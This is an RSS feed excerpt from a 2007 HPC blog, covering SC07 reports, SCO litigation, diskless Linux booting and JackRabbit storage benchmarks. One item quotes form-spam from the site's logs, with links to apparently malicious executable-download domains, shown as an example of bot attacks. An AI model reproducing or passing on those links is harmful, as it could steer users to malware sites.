      <link>https://blog.scalability.org/2007/11/data-center-growth-numbers/</link>
      <pubDate>Wed, 28 Nov 2007 13:35:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/data-center-growth-numbers/</guid>
      <description>From an article in Computerworld. They note some results reported at a Gartner data center conference recently. Before I go into this, please remember that I am still laughing over the Itanium2 installed base debacle that Gartner had &amp;ldquo;predicted&amp;rdquo; in the previous decade (and early part of this decade). So, as with all projections, take theirs with a few kg of salt. What is most interesting is that they give current numbers.</description>
    </item>
    
    <item>
      <title>Expecting better of them</title>
      <link>https://blog.scalability.org/2007/11/expecting-better-of-them/</link>
      <pubDate>Fri, 23 Nov 2007 19:17:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/expecting-better-of-them/</guid>
      <description>On Thanksgiving in the US, there is much to reflect upon. Introspection: what you are doing right, and what you are not, is always good. We do quite a bit of it. Though on Thanksgiving, it is interspersed between the mashed potatoes, turkey, and other elements. HPCwire appeared to do some introspection. Sort of. Their language and adoption of one side of a debate is, well, troubling.
They cherry-picked from John Power&amp;rsquo;s blog.</description>
    </item>
    
    <item>
      <title>Losing our giants:  Gene Golub</title>
      <link>https://blog.scalability.org/2007/11/losing-our-giants-gene-golub/</link>
      <pubDate>Wed, 21 Nov 2007 04:54:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/losing-our-giants-gene-golub/</guid>
      <description>I never met Gene Golub; I have his and Charles Van Loan&amp;rsquo;s &amp;ldquo;Matrix Computations&amp;rdquo; book. It is one of those that you pore over, sometimes scratching your head as to how a particular algorithm works, and there is a detailed discussion of how to implement the algorithm, including very helpful discussions of the inner workings.
The book is extraordinary; you can almost hear the lecture proceeding as you read it. It is accessible, and largely comprehensible.</description>
    </item>
    
    <item>
      <title>SGI heads for turbulence again?</title>
      <link>https://blog.scalability.org/2007/11/sgi-heads-for-turbulence-again/</link>
      <pubDate>Sat, 17 Nov 2007 04:40:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sgi-heads-for-turbulence-again/</guid>
      <description>Sadly, I missed John West and the InsideHPC folks at Reno. This was my fault; it was my intention to drop by and say hi. I read InsideHPC and a few others frequently. Turns out, not frequently enough, as he noted something from the San Jose Mercury News on SGI. It&amp;rsquo;s &amp;ldquo;old&amp;rdquo; news now (more than 24 hours), but an SGI shareholder is pushing for a sale to a competitor. The rationale for this is to reduce SG&amp;amp;A costs.</description>
    </item>
    
    <item>
      <title>SC07: short wrap up</title>
      <link>https://blog.scalability.org/2007/11/sc07-short-wrap-up/</link>
      <pubDate>Fri, 16 Nov 2007 19:33:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-short-wrap-up/</guid>
      <description>Next year in Austin &amp;hellip; looking forward to it.
This year was muted relative to previous years. Some high fliers of the past were absent: I didn&amp;rsquo;t see Apple; I suspect they have decided that margins on iPhone and iTunes are simply better for them than getting into pitched battles for clusters. They haven&amp;rsquo;t had much in the way of success/installed base there. Linux Networx wasn&amp;rsquo;t there in a meaningful way (some people may have been in the whisper suites).</description>
    </item>
    
    <item>
      <title>SC07: day 2 recap</title>
      <link>https://blog.scalability.org/2007/11/sc07-day-2-recap/</link>
      <pubDate>Thu, 15 Nov 2007 15:04:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-day-2-recap/</guid>
      <description>Well, for day 2 I had very little in the way of looking at demos. It was a day of meetings. That and a BOF. Ok, I did get to see the D-Wave Systems stuff and ask some questions. It is not precisely what I thought it was. In short, they map problems onto an Ising model, and then cool the chip. The mapping onto the Ising model may be understood in terms of constraints on the &amp;ldquo;spin&amp;rdquo; state of the model.</description>
    </item>
    
    <item>
      <title>SC07: the nightlife</title>
      <link>https://blog.scalability.org/2007/11/sc07-the-nightlife/</link>
      <pubDate>Wed, 14 Nov 2007 06:57:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-the-nightlife/</guid>
      <description>So I had two events to attend, overlapping of course (of course). Beobash and a dinner with Microsoft. John and I got to Beobash and I spoke with Chris Samuel of VPAC and some associates from Australia. Doug Eadline interviewed me (and I didn&amp;rsquo;t have the slightest clue as to what I was going to say, so it came out rather funny sounding, sorry Doug). I spoke with lots of good people.</description>
    </item>
    
    <item>
      <title>SC07: what I saw so far</title>
      <link>https://blog.scalability.org/2007/11/sc07-what-i-saw-so-far/</link>
      <pubDate>Wed, 14 Nov 2007 06:44:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-what-i-saw-so-far/</guid>
      <description>Lots of stuff. Some of it pretty nice. Still lots of &amp;ldquo;me-too&amp;rdquo; products. The usual suspects are there. Evergrid is neat. Yeah, there I said it. It is neat. Vipin suggested I look at it and I did. Did I mention it is neat?
Lots of RAID cards/storage companies all showing off 5+ GB/s to hundreds of disks. Live on the floor. Running IOmeter (hmmmm). Mellanox showed off some nice new 10GbE cards.</description>
    </item>
    
    <item>
      <title>SC07: Coolest demo I saw today</title>
      <link>https://blog.scalability.org/2007/11/sc07-coolest-demo-i-saw-today/</link>
      <pubDate>Wed, 14 Nov 2007 06:33:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-coolest-demo-i-saw-today/</guid>
      <description>Go to the PSC (Pittsburgh Supercomputer Center) booth. Look at the Wii-steered molecular dynamics. Do some bowling with bucky balls using the Wii. In 1990, I wanted a VR system, and a data glove to position my atoms for my MD simulations. Vi is not a great user interface to configuration.
In 2007 the folks at PSC did a bang up job (great job) showing what could be done. This isn&amp;rsquo;t just a cute demo, it has real potential, for people studying specific reaction pathways, or needing to explore CVD, or protein misfolding (their alanine example shows guided folding), or &amp;hellip; Provide enough computing power, and you create an enabling technology.</description>
    </item>
    
    <item>
      <title>SC07: Planes and automobiles ... no trains ...</title>
      <link>https://blog.scalability.org/2007/11/sc07-planes-and-automobiles-no-trains/</link>
      <pubDate>Wed, 14 Nov 2007 06:25:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/sc07-planes-and-automobiles-no-trains/</guid>
      <description>We had an adventure going from Detroit to Reno. In LA, our outbound flight was canceled. Engine problems from what we understand. So we were booked at a hotel, and got to enjoy a relaxing 4 hour sleep. Thank gosh for Starbucks (Starboooooks). Triple shot mocha &amp;hellip; enough calories and caffeine to stave off a crash &amp;hellip; for a while, though I am gonna be paying for it later on. But, we are here.</description>
    </item>
    
    <item>
      <title>Dear web creators everywhere ...</title>
      <link>https://blog.scalability.org/2007/11/dear-web-creators-everywhere/</link>
      <pubDate>Sat, 10 Nov 2007 20:21:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/dear-web-creators-everywhere/</guid>
      <description>&amp;hellip; I know you think that pushing sound out to a browser is a good idea. I know you think the technology is cool. It is annoying. Absolutely, positively, completely annoying. I do not want to be listening to something I want to listen to, only to be interrupted by something intruding, uninvited, onto my audio system. It is worse than popups, which I block as they are annoying. I never gave you permission to use my resources in this manner.</description>
    </item>
    
    <item>
      <title>at SC07 next week</title>
      <link>https://blog.scalability.org/2007/11/at-sc07-next-week/</link>
      <pubDate>Fri, 09 Nov 2007 03:49:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/at-sc07-next-week/</guid>
      <description>Won&amp;rsquo;t live-blog, but I will try to snap pictures, get some video, and other things. Will report on neat new things. Maybe some neat old things. Hopefully will see many old friends, and make some new ones. Much to do, much to do &amp;hellip;</description>
    </item>
    
    <item>
      <title>DragonFly update</title>
      <link>https://blog.scalability.org/2007/11/dragonfly-update/</link>
      <pubDate>Wed, 07 Nov 2007 07:22:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/dragonfly-update/</guid>
      <description>Here are a few screenshots. Too tired to make thumbnails.
Login, Projects, Add Project, Jobs, Project Users, Wizard, Apps. The web system is fully db-centric now. Finishing up the utilities. Hopefully they will be done before SC07. The Mercurial repository is up if you want to see what we are up to (and look at our latest commits).</description>
    </item>
    
    <item>
      <title>When Perl modules go bad</title>
      <link>https://blog.scalability.org/2007/11/when-perl-modules-go-bad/</link>
      <pubDate>Fri, 02 Nov 2007 00:18:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/when-perl-modules-go-bad/</guid>
      <description>There is a name for my pain and it is WWW::Mechanize. This module is a complex little bit which allows Perl code to programmatically load and interact with web sites. Of course it doesn&amp;rsquo;t have a built in JavaScript engine or anything else like that, but it is supposed to be used for unit testing. That is, provided it works. Which, on many machines and systems I have tried, it simply does not.</description>
    </item>
    
    <item>
      <title>Diskless SuSE, success at last</title>
      <link>https://blog.scalability.org/2007/10/diskless-suse-success-at-last/</link>
      <pubDate>Thu, 01 Nov 2007 03:37:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/diskless-suse-success-at-last/</guid>
      <description>SuSE has been resisting me running it diskless. Actively resisting. The end result was that I had to build a custom kernel (we are using/supporting 2.6.22.6 right now), making sure to build NFS and networking in, and not as modules. What I learned was that even if you think you have built everything, you could leave important little things off. And Murphy&amp;rsquo;s law dictates that those left-off things are important.</description>
    </item>
    
    <item>
      <title>Source of amusement for a monday evening</title>
      <link>https://blog.scalability.org/2007/10/source-of-amusement-for-a-monday-evening/</link>
      <pubDate>Mon, 29 Oct 2007 22:45:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/source-of-amusement-for-a-monday-evening/</guid>
      <description>Update 24-Dec-2007: One of the site owners listed below contacted me and asked me to remove their personal information, which was contained in the site registration. I complied. I have not checked whether or not their system is still an attack host. It is very important that people with good intentions protect their systems before placing them on the net. It is generally very hard to do this for Windows, and fairly easy to do this for Linux.</description>
    </item>
    
    <item>
      <title>reading an interesting book, and an interesting site</title>
      <link>https://blog.scalability.org/2007/10/reading-an-interesting-book-and-an-interesting-site/</link>
      <pubDate>Mon, 29 Oct 2007 06:17:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/reading-an-interesting-book-and-an-interesting-site/</guid>
      <description>&amp;ldquo;The Education of an Accidental CEO&amp;rdquo;. Very interesting read. It turns out a number of the folks who have written about their experience running companies all talk about the &amp;ldquo;gut feeling&amp;rdquo; about things. People, partners, etc.
I had some &amp;ldquo;gut feelings&amp;rdquo; about some stuff I won&amp;rsquo;t get into, and I found myself not following them. This was a mistake. Past times when I did &amp;ldquo;follow my gut&amp;rdquo;, I wasn&amp;rsquo;t led astray.</description>
    </item>
    
    <item>
      <title>teaching an old distribution new booting tricks</title>
      <link>https://blog.scalability.org/2007/10/teaching-an-old-distribution-new-booting-tricks/</link>
      <pubDate>Mon, 29 Oct 2007 06:09:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/teaching-an-old-distribution-new-booting-tricks/</guid>
      <description>So I am trying to get SuSE to PXE boot into a diskless session. In order to do this, first I have to get it to install into a directory. Next we have to do something about the kernel.
The first part is sort of, kind of, solved. Took a while, but it is working. Second is more complex. SuSE doesn&amp;rsquo;t make it easy to remaster the kernel. Nor does RH (or Fedora, &amp;hellip;).</description>
    </item>
    
    <item>
      <title>When bad people/bots attack</title>
      <link>https://blog.scalability.org/2007/10/when-bad-peoplebots-attack/</link>
      <pubDate>Fri, 26 Oct 2007 16:26:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/when-bad-peoplebots-attack/</guid>
      <description>In some of our logs, we come across some of the more interesting things people try to jam into our forms. The examples below have some, well, interesting aspects to them.
&amp;lt;a href= http://6.exefiles.cn/adduserexe-resource-kit.html &amp;amp;rt;adduser.exe resource kit&amp;lt;/a&amp;amp;rt; [url=http://6.exefiles.cn/adduserexe-resource-kit.html]adduser.exe resource kit[/url] &amp;lt;a href= http://7.microsoft-security.cn/ntfrsexe.html &amp;amp;rt;ntfrs.exe&amp;lt;/a&amp;amp;rt; [url=http://7.microsoft-security.cn/ntfrsexe.html]ntfrs.exe[/url] &amp;lt;a href= http://7.exefiles.cn/jammerexe.html &amp;amp;rt;jammer.exe&amp;lt;/a&amp;amp;rt; [url=http://7.exefiles.cn/jammerexe.html]jammer.exe[/url] &amp;lt;a href= http://7.exefiles.cn/piv-pivbrowardschoolscom-pivexe.html &amp;amp;rt;piv piv.browardschools.com piv.exe&amp;lt;/a&amp;amp;rt; [url=http://7.exefiles.cn/piv-pivbrowardschoolscom-pivexe.html]piv piv.browardschools.com piv.exe[/url] &amp;lt;a href= http://10.antyspyware.cn/spdbvexe.html &amp;amp;rt;spdbv.exe&amp;lt;/a&amp;amp;rt; [url=http://10.antyspyware.cn/spdbvexe.html]spdbv.exe[/url] &amp;lt;a href= http://5.exefiles.cn/regenv32-has-caused-an-error-in-regenv32exe.html &amp;amp;rt;regenv32 has caused an error in regenv32.</description>
    </item>
    
    <item>
      <title>Duct tape, baling wire, and sealing wax</title>
      <link>https://blog.scalability.org/2007/10/duct-tape-baling-wire-and-sealing-wax/</link>
      <pubDate>Tue, 23 Oct 2007 06:19:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/duct-tape-baling-wire-and-sealing-wax/</guid>
      <description>None of the above were used in DragonFly, though sometimes, sometimes, it feels like it. DragonFly launched its first job this morning at 2am, 11 hours before the demo. Nah, that&amp;rsquo;s not cutting it close &amp;hellip; not at all. The job is the same ptb.exe job from before, on 4 CPUs, with 100000 iterations (the other one finishes too quickly).
Had to hardwire some bits to deal with bugs I need to fix.</description>
    </item>
    
    <item>
      <title>The power of good tools</title>
      <link>https://blog.scalability.org/2007/10/the-power-of-good-tools/</link>
      <pubDate>Mon, 22 Oct 2007 23:47:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/the-power-of-good-tools/</guid>
      <description>Ok, sort of another minor DragonFly milestone &amp;hellip; except that no code in DragonFly has changed. Previously, we pulled our job description from a file, and used it to create the job for us. Now, without changing a single line in the code, we have done this:
dragonfly@dragonfly:~/utilities$ ./build_job.pl --job=http://dragonfly:3001/jobs/xml/14 --program=ptb.xml --debug
D[27064]: os = &#39;linux&#39;
D[27064]: directory = &#39;/home/dragonfly/utilities&#39;
D[27064]: opening temp file in directory ....
D[27064]: parsing XML from job=&#39;http://dragonfly:3001/jobs/xml/14&#39;
D[27064]: parsing XML from program=&#39;ptb.</description>
    </item>
    
    <item>
      <title>And yet another learning moment</title>
      <link>https://blog.scalability.org/2007/10/and-yet-another-learning-moment/</link>
      <pubDate>Tue, 16 Oct 2007 22:39:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/and-yet-another-learning-moment/</guid>
      <description>No, won&amp;rsquo;t get into detail. Sometimes in the course of business you realize that the people speaking to you have expectations that are entirely out of alignment with yours. After spending months in a careful and cautious dance to make sure that they are in fact in alignment. I learned a great deal today. Saddened by the course of events, but I learned.</description>
    </item>
    
    <item>
      <title>DragonFly milestone</title>
      <link>https://blog.scalability.org/2007/10/dragonfly-milestone/</link>
      <pubDate>Tue, 16 Oct 2007 02:15:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/dragonfly-milestone/</guid>
      <description>A long time ago, on a computer not so far away, we built a program called &amp;ldquo;SICE&amp;rdquo;. Yeah, I am not known for naming things well. SICE&amp;rsquo;s entire purpose in life was to be a user centric interface to HPC systems. When users wanted to run jobs, they filled out a web form that described the job, and off it went. This was not similar to other things out there in the market.</description>
    </item>
    
    <item>
      <title>Interesting comment from one of the largest vendors of computers</title>
      <link>https://blog.scalability.org/2007/10/interesting-comment-from-one-of-the-largest-vendors-of-computers/</link>
      <pubDate>Sun, 14 Oct 2007 13:28:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/interesting-comment-from-one-of-the-largest-vendors-of-computers/</guid>
      <description>The arguments for vendor support of Linux are simple economics. In HPC this usually means that a vendor has a reasonable expectation of return on their investment if they support Linux. This is a valid view if you have something of value that people want at a price they are willing to pay. The arguments for computer vendor support of Linux are again, simple economics. If Linux is driving business, you expect a vendor to pay attention.</description>
    </item>
    
    <item>
      <title>Vote for your favorite HPC technologies at HPCwire</title>
      <link>https://blog.scalability.org/2007/10/vote-for-your-favorite-hpc-technologies-at-hpcwire/</link>
      <pubDate>Thu, 11 Oct 2007 16:31:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/vote-for-your-favorite-hpc-technologies-at-hpcwire/</guid>
      <description>[to vote, go to this link ] I received this email from HPCwire:
You know, we happen to have this terrific high performance storage system, that generates incredible performance at a highly aggressive price &amp;hellip; If you think it is worth spending some electrons/clock cycles on, please go to their link and vote. If you like what you may have read about JackRabbit here or elsewhere, please, by all means, let them know.</description>
    </item>
    
    <item>
      <title>[head shakes in disbelief]</title>
      <link>https://blog.scalability.org/2007/10/head-shakes-in-disbelief/</link>
      <pubDate>Wed, 10 Oct 2007 19:54:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/head-shakes-in-disbelief/</guid>
      <description>I saw this posted as an update from Groklaw.
I think I said something to this effect (http://scalability.org/?p=417) just a few days ago. Turns out that it doesn&amp;rsquo;t appear to be just in private. The Microsoft folks could do great things in the HPC space if there were a little less NIH and a bit more &amp;ldquo;hey, let&amp;rsquo;s work with the community&amp;rdquo;. Unfortunately, with a CEO making statements like this, it is a little hard to convince the community that you want to, I dunno, work with them as opposed to suing them.</description>
    </item>
    
    <item>
      <title>Ubuntu kernels: is anyone paying attention???</title>
      <link>https://blog.scalability.org/2007/10/ubuntu-kernels-is-anyone-paying-attention/</link>
      <pubDate>Wed, 10 Oct 2007 16:05:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/ubuntu-kernels-is-anyone-paying-attention/</guid>
      <description>I have noticed this now on my laptop, on JackRabbit, on a few other systems. The Ubuntu kernels are thrashing with context switches. 4000-5000 or so per second, and fast machines are rendered sluggish. So we build our own. Did that for Ubuntu thus far, and it has been good. Context switches per second down around 100 or so at idle. Where they should be.
I just wonder if anyone at Canonical is paying attention to this.</description>
    </item>
    
    <item>
      <title>Last time, on as the FOSS turns, ...</title>
      <link>https://blog.scalability.org/2007/10/last-time-on-as-the-foss-turns/</link>
      <pubDate>Tue, 09 Oct 2007 15:23:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/last-time-on-as-the-foss-turns/</guid>
      <description>Just as Linux and HPC on Linux clears the SCO debacle, new FUD from a familiar source. Yup, our buddy is up to his old tricks. Groklaw has the story. Some snippets:
Well, yes. Of course. And in the court of public opinion, we see the response. Linux usage is increasing by the per-unit data, which doesn&amp;rsquo;t count reloaded/remissioned systems (we have done several for customers recently; their data will count in the Windows column, as that is what they shipped with, though they are running Linux now, and this is not counted in any column).</description>
    </item>
    
    <item>
      <title>Going for the fall ...</title>
      <link>https://blog.scalability.org/2007/10/going-for-the-fall/</link>
      <pubDate>Sun, 07 Oct 2007 00:03:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/going-for-the-fall/</guid>
      <description>Well, the circus and legal theatre that SCO has created for itself is not quite over yet. Novell appears to be doing something along the lines of what I suggested.
I wrote this:
And today, I read on an article linked from /. that
&amp;hellip; or they may run out of Novell&amp;rsquo;s money, fighting Novell who wants to take possession of Novell&amp;rsquo;s money.
I won&amp;rsquo;t speculate whether or not this motion would be granted.</description>
    </item>
    
    <item>
      <title>We hit the big time ...</title>
      <link>https://blog.scalability.org/2007/10/we-hit-the-big-time/</link>
      <pubDate>Fri, 05 Oct 2007 05:23:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/we-hit-the-big-time/</guid>
      <description>On HPCwire this week, John West included a short summary of our announcement. At least no one has set up a Slashdot submission &amp;hellip; yet. If I see the server load roll past 1000, I know I have been hit by the /. effect. That and hearing silicon whimper&amp;hellip; Hmmm&amp;hellip; maybe that is a good benchmark for JR, put it up as a web server, submit a /. and let er rip :)</description>
    </item>
    
    <item>
      <title>Wherefore art thou, oh Socket 1207/771 CPU cooler?</title>
      <link>https://blog.scalability.org/2007/10/wherefore-art-thou-oh-socket-1207771-cpu-cooler/</link>
      <pubDate>Wed, 03 Oct 2007 15:21:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/wherefore-art-thou-oh-socket-1207771-cpu-cooler/</guid>
      <description>It seems that the choice in CPU cooling solutions for these two sockets (Opteron/Xeon) is slim at best. I guess they aren&amp;rsquo;t volume sellers. What I don&amp;rsquo;t get is why the powers that be sought to invent yet-another-new-cooling-solution-requirement that does a good job of fragmenting the market, and ensuring a limited supply of reasonable cooling systems.
Well, the Intel boxed processors at least come with cpu fans and coolers. As of socket 1207, Opterons no longer do.</description>
    </item>
    
    <item>
      <title>Ohio Linux Fest</title>
      <link>https://blog.scalability.org/2007/10/ohio-linux-fest/</link>
      <pubDate>Tue, 02 Oct 2007 21:04:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/ohio-linux-fest/</guid>
      <description>I was down at OLF with a JackRabbit and a Pegasus workstation. The rest of the booths had filled up, so they placed us near the coffee. Let&amp;rsquo;s see: coffee, IT people &amp;hellip; Hmmm&amp;hellip; They musta liked us! Some friends helped out getting the mini booth up. I put out some pens and 150 JackRabbit pages (couldn&amp;rsquo;t possibly burn through those, right? I figured we would get rid of 20 or so at best).</description>
    </item>
    
    <item>
      <title>Woo hoo, the Quad core Opterons are here!</title>
      <link>https://blog.scalability.org/2007/10/woo-hoo-the-quad-core-opterons-are-here/</link>
      <pubDate>Tue, 02 Oct 2007 21:01:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/woo-hoo-the-quad-core-opterons-are-here/</guid>
      <description>(aka I can buy them in the market &amp;hellip;) See Newegg.</description>
    </item>
    
    <item>
      <title>MPI Class</title>
      <link>https://blog.scalability.org/2007/10/mpi-class/</link>
      <pubDate>Mon, 01 Oct 2007 14:02:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/mpi-class/</guid>
      <description>I taught the first half of an MPI class for a university last friday. It was fun, I showed them how to engineer an application for maximum scalability, as well as how to do basic message passing. There isn&amp;rsquo;t a great deal we can do in a single day, but I did start to get into some of the minutae of MPI programming. It is hard for people to think in parallel.</description>
    </item>
    
    <item>
      <title>Another update: 48TB JackRabbit available for under $1/GB</title>
      <link>https://blog.scalability.org/2007/10/another-update-48tb-jackrabbit-available-for-under-1gb/</link>
      <pubDate>Mon, 01 Oct 2007 13:55:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/another-update-48tb-jackrabbit-available-for-under-1gb/</guid>
      <description>Almost forgot to mention. Our 48 TB unit is now available for under $1/GB (e.g. less than $48k). This is, as far as we know, the densest storage server/appliance available on the market today. See the full product line with pricing data on the JackRabbit site.</description>
    </item>
    
    <item>
      <title>How pricing has changed over time ...</title>
      <link>https://blog.scalability.org/2007/10/how-pricing-has-changed-over-time/</link>
      <pubDate>Mon, 01 Oct 2007 13:51:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/10/how-pricing-has-changed-over-time/</guid>
      <description>Wow&amp;hellip; we ran through a pricing update for JackRabbit last week in preparation for several marketing events/shows, and wow &amp;hellip; what a difference several months make. Everything (but the chassis) has fallen significantly in price. Which means we were able to lower our prices, significantly. Looking at the gamut, only at the very low end of the offerings is the pricing greater than $1/GB. Everywhere else, the pricing is less than $1/GB.</description>
    </item>
    
    <item>
      <title>Raw data</title>
      <link>https://blog.scalability.org/2007/09/raw-data/</link>
      <pubDate>Sun, 23 Sep 2007 17:31:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/raw-data/</guid>
      <description>So here we are, generating load for a JackRabbit test. A prospective partner wants to know what it can handle. Fair enough; we would like to know if we can push it to its limits. Basic test: 4-way channel bond gigabit, with NFS export. 4 client machines mounting this, all generating load via iozone. Iozone run like this:
I started out with a motley crew of client hosts, all running whatever version of Linux, figuring this would be fine.</description>
    </item>
    
    <item>
      <title>IOzone out where the buffalo roam ...</title>
      <link>https://blog.scalability.org/2007/09/iozone-out-where-the-buffalo-roam/</link>
      <pubDate>Thu, 20 Sep 2007 14:12:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/iozone-out-where-the-buffalo-roam/</guid>
      <description>or something like that. Running IOzone (slightly modified to be able to run in a region far outside cache) on JackRabbit-s. 8TB raw, using a 5.5TB partition of 13 drives in a RAID6. Run is done via
As soon as it finishes, I will put the excel file up for download. We are seeing pretty good performance. Here is a snippet:
[ ](http://scalability.org/images/iozone-big.png)
The file sizes are 64 GB, 128 GB, 256 GB, 512 GB, and 1 TB (last row).</description>
    </item>
    
    <item>
      <title>Ok, that does it</title>
      <link>https://blog.scalability.org/2007/09/ok-that-does-it/</link>
      <pubDate>Mon, 17 Sep 2007 23:55:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/ok-that-does-it/</guid>
      <description>After reading this
      at that bastion of high value reporting, Valleywag, I am henceforth going to borrow &amp;hellip; er &amp;hellip; steal &amp;hellip; er &amp;hellip; use Amir&amp;rsquo;s idea and call HPC what it really is. Social (and physical) networking for highly autistic AI Processing elements. Yeah, they are highly focused. On computing. And networking. Need a name for this.
I know, SNAP. Yeah. There we go. And a logo.
[ ](http://scalability.org/images/snap.jpg)</description>
    </item>
    
    <item>
      <title>Panta closes, LightSpace Technology put on ice</title>
      <link>https://blog.scalability.org/2007/09/panta-closes-lightspace-technology-put-on-ice/</link>
      <pubDate>Mon, 17 Sep 2007 22:57:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/panta-closes-lightspace-technology-put-on-ice/</guid>
      <description>I had not written about this two weeks ago when I learned of it, but Panta Systems, a pioneer in flexible HPC and computing systems, closed its doors. Details are sketchy; basically, they were unable to find a buyer, from what I have heard. They were pursuing VC money about a year ago, though I am not sure what happened. Best guess, based upon conversations, was that they ran out of money.</description>
    </item>
    
    <item>
      <title>The future of Cell ?</title>
      <link>https://blog.scalability.org/2007/09/the-future-of-cell/</link>
      <pubDate>Mon, 17 Sep 2007 22:39:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/the-future-of-cell/</guid>
      <description>In an article today, a report noted that Sony may be trying to sell off its fabs that make the Cell BE processor. This is, to quote the article
      Remember, there are 3 partners working on this: IBM, Sony, and Toshiba. Sony is using these in the PS3, which by all accounts is not selling well. PS3&amp;rsquo;s are badly crippled for computing (rumor has it that this is the case as a result of an agreement with IBM), and are having a hard time against the Wii and others.</description>
    </item>
    
    <item>
      <title>More comments this weekend on SCO</title>
      <link>https://blog.scalability.org/2007/09/more-comments-this-weekend-on-sco/</link>
      <pubDate>Mon, 17 Sep 2007 04:47:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/more-comments-this-weekend-on-sco/</guid>
      <description>It turns out that others, who know far more about the law than I do (I am not a lawyer, and don&amp;rsquo;t give legal advice) are suggesting that chapter 11 is less likely. They did a similar analysis, though with more legal detail. Worth the read. The punchline is that someone may have advised them that this was a good idea, and that an external analysis seems to show that this plan was a very bad one for SCO.</description>
    </item>
    
    <item>
      <title>Saying it out loud</title>
      <link>https://blog.scalability.org/2007/09/saying-it-out-loud/</link>
      <pubDate>Sat, 15 Sep 2007 22:04:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/saying-it-out-loud/</guid>
      <description>Ok, I need to ask this. Was the September 10th Barcelona launch a paper launch? I can&amp;rsquo;t seem to find any in the channel. We have customers interested in them, and yes, I can get pricing. But delivery? Or delivery dates? Hmmmmmmmmmm&amp;hellip;.. AMD, please remember my suggestion for 8 core. It shouldn&amp;rsquo;t be hard. And if you don&amp;rsquo;t do something like that I can guarantee your competitor will.</description>
    </item>
    
    <item>
      <title>SCO asks court to protect it from having to pay its acknowledged debts</title>
      <link>https://blog.scalability.org/2007/09/sco-asks-court-to-protect-it-from-having-to-pay-its-acknowledged-debts/</link>
      <pubDate>Sat, 15 Sep 2007 01:07:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/sco-asks-court-to-protect-it-from-having-to-pay-its-acknowledged-debts/</guid>
      <description>Yes, SCO filed for chapter 11 protection from its creditors today. I guess I find it odd, as they did not appear to be in debt. Call me naive, but, in order to get Chapter 11 protection, mustn&amp;rsquo;t you already be in debt and unable to pay your creditors? From our friends at Yahoo:
That is, SCO has no debt on its balance sheet. Oh, that is, unless they came around to Novell&amp;rsquo;s position.</description>
    </item>
    
    <item>
      <title>Quote of the day ... from The Inquirer</title>
      <link>https://blog.scalability.org/2007/09/quote-of-the-day-from-the-inquirer/</link>
      <pubDate>Wed, 12 Sep 2007 18:56:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/quote-of-the-day-from-the-inquirer/</guid>
      <description>Ok, this was perfect for a sleepy Wednesday &amp;hellip; I haven&amp;rsquo;t said much about Barcelona. Yeah, it released. Yeah, I want to play with some. No, I don&amp;rsquo;t have any (big hint there AMD&amp;hellip;.) The Inquirer has an article on power, and some of the press (mis)interactions currently going on with AMD. And a little commentary. This gem was in the commentary &amp;hellip;
Yeah, well, that&amp;rsquo;s about the size of it.</description>
    </item>
    
    <item>
      <title>Some JackRabbit-S benchmarks</title>
      <link>https://blog.scalability.org/2007/09/some-jackrabbit-s-benchmarks/</link>
      <pubDate>Wed, 12 Sep 2007 16:49:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/09/some-jackrabbit-s-benchmarks/</guid>
      <description>Have a new JackRabbit-S unit in the lab, 5.5TB (16 drive unit, 2 allocated for OS, 1 for hot spare, RAID6 built out of remaining 13 drives).
and dbench output
a really simple script:
#!/bin/bash
sync
echo -n &amp;quot;start at &amp;quot;
date
dd if=/dev/zero of=/local/big.file bs=134217728 count=100 oflag=direct
sync
echo -n &amp;quot;stop at &amp;quot;
date
and its results
Hmmm&amp;hellip;. on a 16 GB machine, even with the sync&amp;rsquo;s I am worried about cache.</description>
    </item>
    
    <item>
